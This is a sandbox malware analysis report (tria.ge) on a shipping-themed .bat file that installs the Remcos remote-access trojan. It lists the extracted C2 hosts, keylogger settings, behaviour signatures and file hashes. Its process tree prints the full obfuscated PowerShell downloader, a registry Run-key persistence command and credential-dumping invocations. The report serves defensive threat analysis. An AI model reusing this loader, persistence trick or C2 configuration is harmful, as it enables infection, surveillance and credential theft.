Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

awb_shippi...24.bat

windows7-x64

10

awb_shippi...24.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/11/2024, 06:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_post_28112024224782020031808174CN28112024000001124.bat

  • Size

    6KB

  • MD5

    f37fb720f0662ce5bac44b7e19b03864

  • SHA1

    daeac2db53e78b1139d1ef3351ecda6c66deb09e

  • SHA256

    df2cba523549cdb60b69c1de396325a4bf3d86d1013378a169273c4aa99d4da9

  • SHA512

    9aa63156cb66c548a0703c3f0a21d0e26d7939c62c0268b909e8c9ae3a1189753c3c0cec18e3e5e4cd806e4ea274e721faa0e41ee6cfd36a862ba581201b33fc

  • SSDEEP

    192:YEo+WKuRms3YnN5ekWwsQRbXwwgYTVVSGogXs3:DojPgs3UN5LWw7RDwwppjvc3

Score
10/10
remcosa$iancollectiondiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-WMSLPY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_28112024224782020031808174CN28112024000001124.bat"
    1⤵
    • System Network Configuration Discovery: Internet Connection Discovery
    • Suspicious use of WriteProcessMemory
    PID:5072
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden ";$Medallionist='Tyrosinase';;$Cream='Reedbirds';;$Gimmicker='Filterability';;$Branchiocardiac='Kanons176';;$Strandvejen178='Hysteranthous';;$Tagmemes=$host.Name;function Ignorher($brugeradgangskodes){If ($Tagmemes) {$Stillevejen=5} for ($Modifikationers=$Stillevejen;;$Modifikationers+=6){if(!$brugeradgangskodes[$Modifikationers]) { break }$Unring132+=$brugeradgangskodes[$Modifikationers]}$Unring132}function Bibeholdelsernes($Objektsprogs){ .($Tjenestemandsansats) ($Objektsprogs)}$Kulturbegivenheden=Ignorher ' PrednPlejeeTauroTP iap. BoxtwGravreNonsebmo otCAutokl RubbICoaduEStahlnPlurit';$Chiniofon=Ignorher 'Pto aM I dvoTrommzKoketiHightlHa.drl Yella Unlo/';$Untoppled=Ignorher 'FejlfTNervelSundhsOphng1 inge2';$Undervisningspligtige=' Fle.[ Ami NChumaERestaTpassb.TornoSSta leHonn.RC nseV Perui ndskc llegeExtinp Disaosar eiNoritnGaulltLettem.lgorAEidolNUoverAAfgifgSt laE An,eRUrete]Foutr:Snore:BefipS MuntEHavanCA.penutyt,erFatteIGenavTToxicYVrdigp GeneR.holao Co.gTRok,uoPortaCLambiO S inLDayr,=Vrlsl$ BedaUA,vernP mpetWh.weO eos PSquirpbkkenLBe,isEcarbuD';$Chiniofon+=Ignorher 'Dyrkn5Uafla.Be,an0Breto vold( erdeWEquiliJouncn SlavdCurreoHmoglwYderrs Slid ForskNA tacTSagso Diagr1Depri0Sid l. ocal0Emmar;Voksn BoniWRevyeiFidgenBalan6Gugge4Regnb;Frag anskuxAlec,6Undse4Impas; B ot Caulr depovNitra:Stvgr1 Sma.3 Pych1 Infl..asta0Nazif) Accu GendbGForbleKontocdanaik SereoBeslu/ V ri2Asfe 0Barry1Troph0.itha0Fremd1Tatte0 Indl1Perga KupezFOutwaiVallirSprineTur ufDuplioSjlstxbaadt/ ,ace1 Sv s3Graen1Di fu. Dep,0';$Sjussendes=Ignorher 'Moh iuDi trsSavoneKnstrRMilli-OblivAQuantgNettoeRevarnKlockT';$Styrtgodsets=Ignorher 'SoleuhBudbrtSt vbtReforpUnivesSens,: pbyd/Tai.b/EndodgSamm aDeplorAppethDrmmeounexcuIridod CostjC nado AbsquFor.br RomamSlids.PlaticBrekkospiramUnc a/Sv ngPTho,goSolnepElekt2Limfa.SkummpUdpolnJohangBundt>Leucoh BaketTurbetUnbeap.arens,xtem:G,nop/ Bank/Su.dogIn baaQuellrarterh Reduo Nomau ForfdEndowjLangboPrintuse vmrUngoamHjernoForfanInjuneVansk. Precc.malgo ummemTaluk/ L.nnPSve sowiss,pNonni2Inter.AfkorpHermenSne jg';$Tonguester=Ignorher 'Badme>';$Tjenestemandsansats=Ignorher 'LogicIKinesE ksax';$Reinspector='Udgiftsfringers';$Oplysningslinier='\Metoposcopist.Rat';Bibeholdelsernes (Ignorher ' Sprt$NonsyGDec,mlafmaloKildeBSemicASeptaLSorte:RaadsmTran aFerasg ByhanU.gkaUCitraSUdfldsHan oES adiN Peri=Seric$SquileDe.asnR flivAller:Aepy.AHan,npRok.ePFrostD FortaLogouTDoughASkild+ u,il$.enteOAfbrnpLejedLPhospYNdrinsMillinAtaliIRa iaNPro uGRuffeSForesLPab sIPredenpartrIU dereEchoiR');Bibeholdelsernes (Ignorher 'alkoh$YpperGModsiLjovilo D.bbb nweaAHder,lLimon: ,rbeh CatrU AurigCampauTowarEGalden ninoo PallT.impliFidusCKrage=Tolds$BrutasDerivTMascuYGuerdr.gesaTCroniGChylioSpis,D Aus.SMusc,eGoofyTOrmuzS,orfa. Ra iSEfterpFor,aLFrog I PicrTstad,( uadr$OverfT Tre OLeng,NOutdogSrgebuLefleE corssSengeT OcclENormaRKoste)');Bibeholdelsernes (Ignorher $Undervisningspligtige);$Styrtgodsets=$Huguenotic[0];$Verdensbermte245=(Ignorher 'Cheon$NovelgSimpllunderoPitwoBOncogA rednlHeath:SpragaLact gKonvorBarbaIAl.erOMobsmtFeder=A greNCauliEEng nWAvici-HeephostrafB AfvijTuetseFratecDorottBest GastrS co,sYOps,rS Phost paatE,atchMSupe.. Inte$ForsyKLadcyuNoninl EloxTGoldmuBortrr ,nylbYankeeSilliGSchwei elonvKompae orlenEteoch FolkeexfoddPrecoeKendeN');Bibeholdelsernes ($Verdensbermte245);Bibeholdelsernes (Ignorher 'M,sta$ AttiAEjbrigUndocrEquiniUvul,o Fr mtDefos. D.poH rudee CrosaMoha dCataseS,iffrRuykosDevil[Actin$ReiduSHobosjBhut uT ffesUtaalsMicr,e Cig n.ilstdHer ieEconosUnf o]Fibri= c ck$SimulChelinhGree i PsalnDdskniAnparoSi.rafC.stooLedevn');$Hjhusets=Ignorher 'Overd$ Occ AByporgKarenr.kskliCasbaoTascat Outr.ruelsDLiparoSneb,wAtominRediglHypo oBlinda nstad ci aFSc otiOptatl Re.se Reco( Kno $HaandSMiss tGallsy Ve nrAbductTrippgEvertoGraasd,onkosHarmoe howtYtri sMa,da,tagdr$DereaBHakkeoSkrivyG.llekOmhanoM.dbetNonsptSengeeImagetGloe )';$Boykottet=$Magnussen;Bibeholdelsernes (Ignorher 'Frans$OmganGTronaLFllesOFrbevbEurasACo lolG.aaf: B gsAHoldnCUdenlC ftee,hospPT rpeTExfetA Tingb Cer,ECo pllFinaltAkros=Drill(AnstatSa viESvngnsAnysrt,omfr-Lyna,pitha.aboyauT KippHInhab triak$StabsbDagspO JagtyIm ieK tubboPyttaT In itEmbryeHagerT Ency)');while (!$Acceptabelt) {Bibeholdelsernes (Ignorher 'S rut$Reo hg DebulCo,taosalutbS,aala lmenlUnsqu:HleriTWaferiBlgebl oreahAstrouLngd gSn.sdnPseudiGrandn rembgVejbye,dholrUn onnRestre ortr=Caval$ Sk,mMR kshaFy,stg L,vunFrosti Carbf.ygefiPalmec eside tjlen roct') ;Bibeholdelsernes $Hjhusets;Bibeholdelsernes (Ignorher 'Antabs ammotValueaPuppeRspekttHelti- ranssInterlPresaeInvenePunleP B st Orkid4');Bibeholdelsernes (Ignorher ' ala$Skittg NonsLBedr OLen tbS alsaZi.ziLpee.a: MowaA,illeC FletCGenneEJvnfrp ultit Pse.AAfd ibContreBronzlAnlgsTTh.gg=thirt(OpsugTSellaeVastisUsympTBlast-Je stPMarmoaIdenttHoptoh Mom. For k$ RaadbTubero PycnY UrteKG itao.chsaTFedtptWellfE t rbtFibov)') ;Bibeholdelsernes (Ignorher ' f de$togemG,recklBiogrOKommebRegneaDavidLForkr:ProvsSPosttkGra.daVrdigLTz,mmPMoul mUnco a yranrTangl=K ekr$Fere,GDisselG omoOTaberBBlomsADybdelMi ro:InterASurgefSerraHskaanvS,radlMicroeDi,soN rphadLu reESladrsSamle+ snor+Tramp% Tom $UrhnehFrem uN uriGStarsu SaedeUnethNSparrOban.uT langi AskeCTr ne.Non ecmurreOCitrou Fi rN Dry,t') ;$Styrtgodsets=$Huguenotic[$Skalpmar]}$Herbs=324054;$Grnsevrdi45=32132;Bibeholdelsernes (Ignorher 'Kamgr$Ph liGHono,LSpl,tOCellmB CirkAPegaslTruss:Gaf.ebNontyIDe,idl ContlOcellePresbdTe ses Nos,KUidenroversM SkefeAstak Unvar=,alat salivGDumbyeenspntDjrvh-D.ailCBriosoTemp.nCruxftMorgeESlut n Rvestreabb Achro$,nchobusmm oye.omYTuskhkYde los ueptSupe,TParaneUdf,yt');Bibeholdelsernes (Ignorher 'di ho$samiagNonmalBo asoSyst bRuskra C ndlPassi:UnoblLLoud,i UngarOverfiGrns,p oruri knlip Ra ieSupra Rotu =Gener Ha,d[SinicS valey BondsSvngntInhumeFor.smpetro. Mo eCAbreioArguinMonarvIldkueHewlerFladltCharc]Vamos:T wag:PhysaFAromarEskoroFlyvem aladB Sud.a Convs Rec,eBorgm6Panel4ZippeSPavektMaterrNontaiGuffenSkarngdevoi( oral$UnsouBSamoriMout.l FarvlTe dieInterd Tribs ModakUvsner G anm F ereEks,e)');Bibeholdelsernes (Ignorher 'Ka tr$Hyp rGClewsl UtilO .rivBT.nakaT.staLKaffe:Te efuInstaN SurrDInfert DoupAContrgDejagECloacL SterSPa lyeSkinds,emitBSpin eKvldeSLong,tFo.dme appmBu esMEucalEFasellBesviS redbE CubiN Vad. Jamb=Re en Melle[TriviSSu.styFla mS obultKrypte KmpemDkner.s.lgsT P steNaboiXN nlat uadr.Spunse DedenSyrneC Verso,odlyd Regei ForhnGnastgSelen]Menue:hemit:Sha tALitteSIllegC statI On,uiHiber.Centig ScarEpukleT KontSGr wntBrystr Midti KvinN R jsG Untr(Count$ DuodlF guriVurderR selIMindrpExtreIPens PA,parESuper)');Bibeholdelsernes (Ignorher ' ongr$MargiGAnascLNonavo Margb,rundAGuineLWivia: edlehB dknKJos pK Sto E orfaL RetsBDecusEUhyrlnCarroE BranSS,rot= snre$ no auMinicNindkodBuffeTS enkA.igmaGL gkaeSamfuLPrydesCw.ite Af aSUnderB.elviE Gal sHyb,iTUdst EDeglamR conmCume.eski oLPardasIsotoEHaloxN okse.MdeafsDest UBssesBNixonsNyblotExplaR,ysstIIndflnDoktogPolyp(Inter$ M.ndHK naleDelstR uoyeBRkedaSLling,Bla k$Gulchg Po trColomnProgrsArterE AcylvUb leRFertiDAbsceISkole4amtst5M ter)');Bibeholdelsernes $hkkelbenes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1492
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Medallionist='Tyrosinase';;$Cream='Reedbirds';;$Gimmicker='Filterability';;$Branchiocardiac='Kanons176';;$Strandvejen178='Hysteranthous';;$Tagmemes=$host.Name;function Ignorher($brugeradgangskodes){If ($Tagmemes) {$Stillevejen=5} for ($Modifikationers=$Stillevejen;;$Modifikationers+=6){if(!$brugeradgangskodes[$Modifikationers]) { break }$Unring132+=$brugeradgangskodes[$Modifikationers]}$Unring132}function Bibeholdelsernes($Objektsprogs){ .($Tjenestemandsansats) ($Objektsprogs)}$Kulturbegivenheden=Ignorher ' PrednPlejeeTauroTP iap. BoxtwGravreNonsebmo otCAutokl RubbICoaduEStahlnPlurit';$Chiniofon=Ignorher 'Pto aM I dvoTrommzKoketiHightlHa.drl Yella Unlo/';$Untoppled=Ignorher 'FejlfTNervelSundhsOphng1 inge2';$Undervisningspligtige=' Fle.[ Ami NChumaERestaTpassb.TornoSSta leHonn.RC nseV Perui ndskc llegeExtinp Disaosar eiNoritnGaulltLettem.lgorAEidolNUoverAAfgifgSt laE An,eRUrete]Foutr:Snore:BefipS MuntEHavanCA.penutyt,erFatteIGenavTToxicYVrdigp GeneR.holao Co.gTRok,uoPortaCLambiO S inLDayr,=Vrlsl$ BedaUA,vernP mpetWh.weO eos PSquirpbkkenLBe,isEcarbuD';$Chiniofon+=Ignorher 'Dyrkn5Uafla.Be,an0Breto vold( erdeWEquiliJouncn SlavdCurreoHmoglwYderrs Slid ForskNA tacTSagso Diagr1Depri0Sid l. ocal0Emmar;Voksn BoniWRevyeiFidgenBalan6Gugge4Regnb;Frag anskuxAlec,6Undse4Impas; B ot Caulr depovNitra:Stvgr1 Sma.3 Pych1 Infl..asta0Nazif) Accu GendbGForbleKontocdanaik SereoBeslu/ V ri2Asfe 0Barry1Troph0.itha0Fremd1Tatte0 Indl1Perga KupezFOutwaiVallirSprineTur ufDuplioSjlstxbaadt/ ,ace1 Sv s3Graen1Di fu. Dep,0';$Sjussendes=Ignorher 'Moh iuDi trsSavoneKnstrRMilli-OblivAQuantgNettoeRevarnKlockT';$Styrtgodsets=Ignorher 'SoleuhBudbrtSt vbtReforpUnivesSens,: pbyd/Tai.b/EndodgSamm aDeplorAppethDrmmeounexcuIridod CostjC nado AbsquFor.br RomamSlids.PlaticBrekkospiramUnc a/Sv ngPTho,goSolnepElekt2Limfa.SkummpUdpolnJohangBundt>Leucoh BaketTurbetUnbeap.arens,xtem:G,nop/ Bank/Su.dogIn baaQuellrarterh Reduo Nomau ForfdEndowjLangboPrintuse vmrUngoamHjernoForfanInjuneVansk. Precc.malgo ummemTaluk/ L.nnPSve sowiss,pNonni2Inter.AfkorpHermenSne jg';$Tonguester=Ignorher 'Badme>';$Tjenestemandsansats=Ignorher 'LogicIKinesE ksax';$Reinspector='Udgiftsfringers';$Oplysningslinier='\Metoposcopist.Rat';Bibeholdelsernes (Ignorher ' Sprt$NonsyGDec,mlafmaloKildeBSemicASeptaLSorte:RaadsmTran aFerasg ByhanU.gkaUCitraSUdfldsHan oES adiN Peri=Seric$SquileDe.asnR flivAller:Aepy.AHan,npRok.ePFrostD FortaLogouTDoughASkild+ u,il$.enteOAfbrnpLejedLPhospYNdrinsMillinAtaliIRa iaNPro uGRuffeSForesLPab sIPredenpartrIU dereEchoiR');Bibeholdelsernes (Ignorher 'alkoh$YpperGModsiLjovilo D.bbb nweaAHder,lLimon: ,rbeh CatrU AurigCampauTowarEGalden ninoo PallT.impliFidusCKrage=Tolds$BrutasDerivTMascuYGuerdr.gesaTCroniGChylioSpis,D Aus.SMusc,eGoofyTOrmuzS,orfa. Ra iSEfterpFor,aLFrog I PicrTstad,( uadr$OverfT Tre OLeng,NOutdogSrgebuLefleE corssSengeT OcclENormaRKoste)');Bibeholdelsernes (Ignorher $Undervisningspligtige);$Styrtgodsets=$Huguenotic[0];$Verdensbermte245=(Ignorher 'Cheon$NovelgSimpllunderoPitwoBOncogA rednlHeath:SpragaLact gKonvorBarbaIAl.erOMobsmtFeder=A greNCauliEEng nWAvici-HeephostrafB AfvijTuetseFratecDorottBest GastrS co,sYOps,rS Phost paatE,atchMSupe.. Inte$ForsyKLadcyuNoninl EloxTGoldmuBortrr ,nylbYankeeSilliGSchwei elonvKompae orlenEteoch FolkeexfoddPrecoeKendeN');Bibeholdelsernes ($Verdensbermte245);Bibeholdelsernes (Ignorher 'M,sta$ AttiAEjbrigUndocrEquiniUvul,o Fr mtDefos. D.poH rudee CrosaMoha dCataseS,iffrRuykosDevil[Actin$ReiduSHobosjBhut uT ffesUtaalsMicr,e Cig n.ilstdHer ieEconosUnf o]Fibri= c ck$SimulChelinhGree i PsalnDdskniAnparoSi.rafC.stooLedevn');$Hjhusets=Ignorher 'Overd$ Occ AByporgKarenr.kskliCasbaoTascat Outr.ruelsDLiparoSneb,wAtominRediglHypo oBlinda nstad ci aFSc otiOptatl Re.se Reco( Kno $HaandSMiss tGallsy Ve nrAbductTrippgEvertoGraasd,onkosHarmoe howtYtri sMa,da,tagdr$DereaBHakkeoSkrivyG.llekOmhanoM.dbetNonsptSengeeImagetGloe )';$Boykottet=$Magnussen;Bibeholdelsernes (Ignorher 'Frans$OmganGTronaLFllesOFrbevbEurasACo lolG.aaf: B gsAHoldnCUdenlC ftee,hospPT rpeTExfetA Tingb Cer,ECo pllFinaltAkros=Drill(AnstatSa viESvngnsAnysrt,omfr-Lyna,pitha.aboyauT KippHInhab triak$StabsbDagspO JagtyIm ieK tubboPyttaT In itEmbryeHagerT Ency)');while (!$Acceptabelt) {Bibeholdelsernes (Ignorher 'S rut$Reo hg DebulCo,taosalutbS,aala lmenlUnsqu:HleriTWaferiBlgebl oreahAstrouLngd gSn.sdnPseudiGrandn rembgVejbye,dholrUn onnRestre ortr=Caval$ Sk,mMR kshaFy,stg L,vunFrosti Carbf.ygefiPalmec eside tjlen roct') ;Bibeholdelsernes $Hjhusets;Bibeholdelsernes (Ignorher 'Antabs ammotValueaPuppeRspekttHelti- ranssInterlPresaeInvenePunleP B st Orkid4');Bibeholdelsernes (Ignorher ' ala$Skittg NonsLBedr OLen tbS alsaZi.ziLpee.a: MowaA,illeC FletCGenneEJvnfrp ultit Pse.AAfd ibContreBronzlAnlgsTTh.gg=thirt(OpsugTSellaeVastisUsympTBlast-Je stPMarmoaIdenttHoptoh Mom. For k$ RaadbTubero PycnY UrteKG itao.chsaTFedtptWellfE t rbtFibov)') ;Bibeholdelsernes (Ignorher ' f de$togemG,recklBiogrOKommebRegneaDavidLForkr:ProvsSPosttkGra.daVrdigLTz,mmPMoul mUnco a yranrTangl=K ekr$Fere,GDisselG omoOTaberBBlomsADybdelMi ro:InterASurgefSerraHskaanvS,radlMicroeDi,soN rphadLu reESladrsSamle+ snor+Tramp% Tom $UrhnehFrem uN uriGStarsu SaedeUnethNSparrOban.uT langi AskeCTr ne.Non ecmurreOCitrou Fi rN Dry,t') ;$Styrtgodsets=$Huguenotic[$Skalpmar]}$Herbs=324054;$Grnsevrdi45=32132;Bibeholdelsernes (Ignorher 'Kamgr$Ph liGHono,LSpl,tOCellmB CirkAPegaslTruss:Gaf.ebNontyIDe,idl ContlOcellePresbdTe ses Nos,KUidenroversM SkefeAstak Unvar=,alat salivGDumbyeenspntDjrvh-D.ailCBriosoTemp.nCruxftMorgeESlut n Rvestreabb Achro$,nchobusmm oye.omYTuskhkYde los ueptSupe,TParaneUdf,yt');Bibeholdelsernes (Ignorher 'di ho$samiagNonmalBo asoSyst bRuskra C ndlPassi:UnoblLLoud,i UngarOverfiGrns,p oruri knlip Ra ieSupra Rotu =Gener Ha,d[SinicS valey BondsSvngntInhumeFor.smpetro. Mo eCAbreioArguinMonarvIldkueHewlerFladltCharc]Vamos:T wag:PhysaFAromarEskoroFlyvem aladB Sud.a Convs Rec,eBorgm6Panel4ZippeSPavektMaterrNontaiGuffenSkarngdevoi( oral$UnsouBSamoriMout.l FarvlTe dieInterd Tribs ModakUvsner G anm F ereEks,e)');Bibeholdelsernes (Ignorher 'Ka tr$Hyp rGClewsl UtilO .rivBT.nakaT.staLKaffe:Te efuInstaN SurrDInfert DoupAContrgDejagECloacL SterSPa lyeSkinds,emitBSpin eKvldeSLong,tFo.dme appmBu esMEucalEFasellBesviS redbE CubiN Vad. Jamb=Re en Melle[TriviSSu.styFla mS obultKrypte KmpemDkner.s.lgsT P steNaboiXN nlat uadr.Spunse DedenSyrneC Verso,odlyd Regei ForhnGnastgSelen]Menue:hemit:Sha tALitteSIllegC statI On,uiHiber.Centig ScarEpukleT KontSGr wntBrystr Midti KvinN R jsG Untr(Count$ DuodlF guriVurderR selIMindrpExtreIPens PA,parESuper)');Bibeholdelsernes (Ignorher ' ongr$MargiGAnascLNonavo Margb,rundAGuineLWivia: edlehB dknKJos pK Sto E orfaL RetsBDecusEUhyrlnCarroE BranSS,rot= snre$ no auMinicNindkodBuffeTS enkA.igmaGL gkaeSamfuLPrydesCw.ite Af aSUnderB.elviE Gal sHyb,iTUdst EDeglamR conmCume.eski oLPardasIsotoEHaloxN okse.MdeafsDest UBssesBNixonsNyblotExplaR,ysstIIndflnDoktogPolyp(Inter$ M.ndHK naleDelstR uoyeBRkedaSLling,Bla k$Gulchg Po trColomnProgrsArterE AcylvUb leRFertiDAbsceISkole4amtst5M ter)');Bibeholdelsernes $hkkelbenes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1788
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
        PID:4832
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\SysWOW64\msiexec.exe"
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4488
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Skyggebillederne" /t REG_EXPAND_SZ /d "%Bestillingssiden% -windowstyle 1 $Kraasesuppe=(gp -Path 'HKCU:\Software\Claque\').Hingism;%Bestillingssiden% ($Kraasesuppe)"
            4⤵
            • Adds Run key to start application
            • System Location Discovery: System Language Discovery
            • Modifies registry key
            PID:4276
        • C:\Windows\SysWOW64\msiexec.exe
          C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\iwuvmcfcrrbabzjggtodgnsdilvtpx"
          3⤵
            PID:1752
          • C:\Windows\SysWOW64\msiexec.exe
            C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\iwuvmcfcrrbabzjggtodgnsdilvtpx"
            3⤵
              PID:1220
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\iwuvmcfcrrbabzjggtodgnsdilvtpx"
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4188
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\szagnuqwfztmdgxkqdbxrzfujrnciavps"
              3⤵
              • Accesses Microsoft Outlook accounts
              • System Location Discovery: System Language Discovery
              PID:1796
            • C:\Windows\SysWOW64\msiexec.exe
              C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vtfyg"
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2108

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          d4ff23c124ae23955d34ae2a7306099a

          SHA1

          b814e3331a09a27acfcd114d0c8fcb07957940a3

          SHA256

          1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

          SHA512

          f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmrewcuu.mpz.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\iwuvmcfcrrbabzjggtodgnsdilvtpx
          Filesize

          4KB

          MD5

          ac300aeaf27709e2067788fdd4624843

          SHA1

          e98edd4615d35de96e30f1a0e13c05b42ee7eb7b

          SHA256

          d2637d58bb120dc6fefe2f38d6e0d4b308006b8639106a7f9e915fa80b5cc9d9

          SHA512

          09c46e708f9d253dccd4d943639d9f8126f868ae3dcd951aad12222bb98b5d3814676f878c8391b9bdab5dedcf5b9e9eaeb2ad3ffec57bda875198735586d4df

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Metoposcopist.Rat
          Filesize

          463KB

          MD5

          f1e051f3aaa58d075d105694556aa551

          SHA1

          c9cc0b56985131d889fdadc263e708af200fe79c

          SHA256

          aa6882110f1bc455a4e6d61e443cb0930df88f089eabab30c56d8059b002a5b3

          SHA512

          e675f43ccf46a8e33ed344800c763f4d895c6af2e9b27ef49acd354eee7ac8ff5803b4926d199677b19b9428054fbdadec2985b9ad1b22b156478d36bb1c55dd

          Download Submit

        • memory/1492-3-0x000001FD27F50000-0x000001FD27F72000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1492-13-0x00007FFEFB170000-0x00007FFEFBC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1492-14-0x00007FFEFB170000-0x00007FFEFBC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1492-17-0x00007FFEFB170000-0x00007FFEFBC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1492-20-0x00007FFEFB170000-0x00007FFEFBC31000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/1492-2-0x00007FFEFB173000-0x00007FFEFB175000-memory.dmp

          Filesize

          8KB

          Download

        • memory/1788-46-0x0000000008350000-0x00000000088F4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/1788-52-0x0000000074FD0000-0x0000000075780000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1788-26-0x0000000005470000-0x0000000005492000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1788-27-0x0000000005510000-0x0000000005576000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1788-28-0x0000000005580000-0x00000000055E6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1788-38-0x0000000005D10000-0x0000000006064000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1788-24-0x00000000055F0000-0x0000000005C18000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/1788-40-0x0000000006330000-0x000000000634E000-memory.dmp

          Filesize

          120KB

          Download

